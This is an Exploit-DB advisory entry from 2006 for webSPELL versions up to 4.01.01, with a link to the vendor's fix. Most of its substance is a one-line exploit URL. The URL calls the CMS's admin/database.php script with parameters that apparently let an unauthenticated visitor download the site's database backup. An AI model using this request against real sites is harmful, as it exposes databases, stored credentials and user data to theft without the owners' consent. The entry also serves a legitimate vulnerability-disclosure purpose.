webSPELL 4.01.01 - Database Backup Download

EDB-ID:

2352


Author:

Trex

Type:

webapps


Platform:

PHP

Date:

2006-09-12


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# WebSPELL <= 4.01.01 Accessible Database Backup Download Exploit
# Discovered by: Trex
# Visit: www.SecuritySector.org / www.UnderGround.ag

# Exploit:
http://[SITE]/[PATH]/admin/database.php?action=write&userID=1

# Solution:
http://cms.webspell.org/index.php?site=files&file=15

# milw0rm.com [2006-09-12]